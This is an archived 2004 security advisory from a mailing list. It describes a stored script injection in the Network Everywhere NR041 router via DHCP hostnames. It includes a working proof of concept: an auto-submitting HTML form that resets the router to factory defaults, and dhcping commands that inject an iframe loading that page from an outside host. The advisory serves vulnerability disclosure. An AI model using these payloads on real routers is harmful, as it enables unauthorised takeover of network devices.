Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NEWS] NetworkEverywhere Router Model NR041 Script Injection via DHCP

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NEWS] NetworkEverywhere Router Model NR041 Script Injection via DHCP
Date: 2 Sep 2004 12:55:40 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  NetworkEverywhere Router Model NR041 Script Injection via DHCP
------------------------------------------------------------------------


SUMMARY

 <http://www.networkeverywhere.com/products/nr041.asp> The Network 
Everywhere NR041 Cable/DSL 4-port router "connects multiple PCs to your 
Cable or DSL modem. The router lets your PCs share one IP address from 
your ISP, files, printers and other resources. It can also function as a 
DHCP server for easy IP assignment".

DHCP HOSTNAME options originating from clients aren't properly filtered 
for malicious content. Due to this fact, malicious script code can be 
injected and stored on the router.

DETAILS

Vulnerable Systems:
 * NR041 firmware revision 1.2 release 03

Since the router doesn't filter out potentially problematic content it is 
easily possible to inject script code into the web-based administrative 
interface. At such a time when the administrator consults the DHCP 
interface, the script code will be executed in the open session by the 
browser and due to the nature of the session, will have full access to the 
router. One possible and easily executed attack is to cause the script to 
reset the router to its factory defaults, rolling back the administration 
password as well.

Since the DHCP daemon is only accessible from within a local network it 
would be hard to exploit. However, if a way exists to issue DHCP requests 
to the router, this vulnerability can be exploited.

A proof of concept can be carried out using DHCPing, available from  
<http://c3rb3r.openwall.net/dhcping/> http://c3rb3r.openwall.net/dhcping/.

As mentioned above, the NR041 is configurable via a web based 
administrative interface using several CGIs and invoked with the HTTP POST 
method. It isn't entirely easy to exploit under the circumstances (15 
character string which you cannot break where ever you wish) but a known 
trick from the exploitation of the DLINK 614+ can be used for assistance.

 * Step 1:
Because there isn't enough room to perform adequate exploitation in one 
shot, a different approach can be used. Injecting code for an IFRAME that 
will force the browser to to remotely call a certain HTML file, i.e.: 
"a.htm" on a malicious website. This file contains a form which will 
auto-submit itself when loaded. The code for such an HTML file is 
presented below. However it is important to note that due to length 
limitations the filename should be as short as possible:
< html>< head>
< script language="JavaScript">
<!--
function SymError()
{
  return true;
}
window.onerror = SymError;
//-->
</script>
<script language="javascript">
function autopost(){
}
</script>
</head><body onload="javascript:document.xx.submit();">
< form name=xx method=post action="http://192.168.1.1/passwd.cgi";>
< input type=hidden name=FactoryDefaults value="Enable">
</form>
</body></html>

The actual attack carried out by this HTML file is to call passwd.cgi with 
the "factorydefaults" option enabled. Notice that the IP is hardcoded in 
this file but it can actually be obtained from the HTTP referrer header, 
making this script work seamlessly.

 * Step 2:
Inject the script containing the IFRAME using DHCPing, like so:

dhcping -optleasetime 3600 -opttype discover -optreqip 192.168.1.121 
-opthostname "/../a.htm' > " -m af:af:af:af:af:af

dhcping -optleasetime 3600 -opttype discover -optreqip 192.168.1.122 
-opthostname "'src='//url.ca/" -m af:af:af:af:af:ae

dhcping -optleasetime 3600 -opttype discover -optreqip 192.168.1.123 
-opthostname "<iframe id=' " -m af:af:af:af:af:ad


ADDITIONAL INFORMATION

The information has been provided by  <mailto:Daemonz@videotron.ca> 
Mathieu Lacroix.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NEWS] NetworkEverywhere Router Model NR041 Script Injection via DHCP, SecuriTeam <=
Previous by Date:  [UNIX] bsdmainutils Local Root Compromise, SecuriTeam
Next by Date:  [EXPL] Courier-IMAP Remote Format String Vulnerability Exploit, SecuriTeam
Previous by Thread:  [UNIX] bsdmainutils Local Root Compromise, SecuriTeam
Next by Thread:  [EXPL] Courier-IMAP Remote Format String Vulnerability Exploit, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]